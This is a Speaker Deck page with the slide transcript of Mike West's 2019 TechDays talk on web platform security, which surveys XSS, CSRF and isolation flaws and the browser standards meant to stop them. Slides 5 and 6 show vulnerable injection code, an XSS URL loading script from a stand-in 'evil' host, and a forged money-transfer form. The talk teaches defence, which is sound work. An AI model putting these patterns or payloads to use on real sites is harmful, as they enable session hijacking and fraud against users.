Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security @ TechDays 2019

3c27881a0d8695811b0fa23bd794e696?s=47 Mike West
PRO
June 03, 2019
Programming
1
100

Web Platform Security @ TechDays 2019

Web Platform Security.

3c27881a0d8695811b0fa23bd794e696?s=128

Mike West
PRO

June 03, 2019
Tweet

More Decks by Mike West

See All by Mike West
Isolation by Default
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
1.1k
The Web We Can Ship
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
210
Web Platform Security @ CMS Security Summit 2020
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
1.6k
Cookies are bad @ HTTP Workshop 2019
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
350
Web Platform Security @ CMS Security Summit
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
67
Web Platform Security PhD Summit @ Google Munich
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
2
650
BSides Munich
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
250
Hardening the Web Platform - AppSec EU, 2016
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
5
1.3k
Web Platform Security (dotSecurity, April 2016)
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
2
1k

Other Decks in Programming

See All in Programming
Meet Swift Regex
0b26590a0a8b0f1da140ed5de9b68379?s=48 usamik26
0
350
シェーダー氷山発掘記
6a661bb5871208cad64912223bb0c637?s=48 logilabo
0
140
engineer
E6706306bf41c5a5675e7296ecdb4103?s=48 spacemarket
0
2.2k
設計の学び方:自分流のススメ
8f84b7d8869ef6005d89b378e8661f7c?s=48 masuda220
PRO
10
6.6k
チームでカレーを作ろう!アジャイルカレークッキング
D30220c903365b2170e791313296b2f9?s=48 akitotsukahara
0
830
heyにおけるCI/CDの現状と課題
4631864606a93224804a49331d1a7dfd?s=48 fufuhu
3
560
CakePHPの内部実装 から理解するPSR-7
750703459030ae520b26376f236f6cdd?s=48 boro1234
0
230
GDG Seoul IO Extended 2022 - Android Compose
7589a5a8fec022e8af4e46525150a291?s=48 taehwandev
0
320
Running Laravel/PHP on AWS (AWS Builders Day Taiwan 2022)
2f42f32689c8244280dd01d864f92079?s=48 dwchiang
0
150
Vite でお手軽 Vue.js の環境構築
Be33a704f251c77162896ac5ba03e9ac?s=48 azuki
2
180
オブジェクト指向で挫折する初学者へ
Dde759e35b9d62d448b3924502750a31?s=48 deepoil
0
170
Angular‘s Future without NgModules: Architectures with Standalone Components @enterJS
15934fa2aa7b2ce21f091e9b7cffa856?s=48 manfredsteyer
PRO
0
230

Featured

See All Featured
Gamification - CAS2011
4394ceb8b277f35ee3da7030384efb5d?s=48 davidbonilla
75
3.9k
The Invisible Customer
4262b9cfacfb6b2c77f23e1d0310cd3e?s=48 myddelton
110
11k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
212
20k
Building Better People: How to give real-time feedback that sticks.
9952dfcd5d338f8a8e7175c8a8f65fb5?s=48 wjessup
344
17k
CSS Pre-Processors: Stylus, Less & Sass
7559f6cff1f5efc2d210965febd4d71c?s=48 bermonpainter
349
27k
Teambox: Starting and Learning
Aebc2d07a50011e2a30d38435fde564a?s=48 jrom
123
7.7k
Easily Structure & Communicate Ideas using Wireframe
0c6fd6a08d0f898159cda7cafcacf07f?s=48 afnizarnur
181
15k
Practical Orchestrator
168ccec72eee0530b818d44f3fedaacf?s=48 shlominoach
178
8.6k
GraphQLとの向き合い方2022年版
893f54413c2bd9ba41d11d753aacaf2c?s=48 quramy
16
8.3k
Build your cross-platform service in a week with App Engine
5f83ef806155b403c3393160ce51f955?s=48 jlugia
219
17k
Why Our Code Smells
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
PRO
324
55k
XXLCSS - How to scale CSS and keep your sanity
1b8ad785acdd1ce1c99914b1c2a4e10e?s=48 sugarenia
236
1M

Transcript

  1. Web Platform Security Mike West, Google Chrome @mikewest mkwst@google.com http://bit.ly/wps_techdays_2019

  2. None
  3. None

  4. Google Vulnerability Reward Program (VRP) payouts in 2018 XSS 35.6%

    CSRF 3.2% Clickjacking 4.2% Other web bugs 7.8% Non-web issues 49.1% Mobile app vulnerabilities Business logic (authorization) Server /network misconfigurations ...

  5. Injections <?php echo $_GET["query"] ?> foo.innerHTML = location.hash.slice(1) 1. Logged

    in user visits attacker's page 2. Attacker navigates user to a vulnerable URL 3. Script runs, attacker gets access to user's session … and many other patterns Bugs: Cross-site scripting (XSS) https://victim.example/?query=<script src="//evil/">

  6. Insufficient isolation 1. Logged in user visits attacker's page 2.

    Attacker sends cross-origin request to vulnerable URL 3. Attacker takes action on behalf of user, or infers information about the user's data in the vulnerable app. Bugs: Cross-site request forgery (CSRF), XS-leaks, timing, ... <form action="/transferMoney"> <input name="recipient" value="Lukas" /> <input name="amount" value="10" /> <form action="//victim.example/transferMoney"> <input name="recipient" value="Attacker" /> <input name="amount" value="∞" />

  7. Insufficient isolation New classes of flaws related to insufficient isolation

    on the web: - Microarchitectural issues (Spectre / Meltdown) - Advanced web APIs used by attackers - Improved exploitation techniques The number and severity of these flaws is growing.

  8. Collaborate in standards bodies

  9. https://w3c.github.io/webappsec-csp/ https://csp.withgoogle.com/

  10. https://wicg.github.io/trusted-types

  11. https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis https://web.dev/samesite-cookies-explained/

  12. https://w3c.github.io/webappsec-fetch-metadata

  13. https://github.com/whatwg/html/issues/3740

  14. https://github.com/whatwg/fetch/issues/687

  15. https://www.arturjanc.com/cross-origin-infoleaks.pdf

  16. Thanks! Mike West, Google Chrome @mikewest mkwst@google.com http://bit.ly/wps_techdays_2019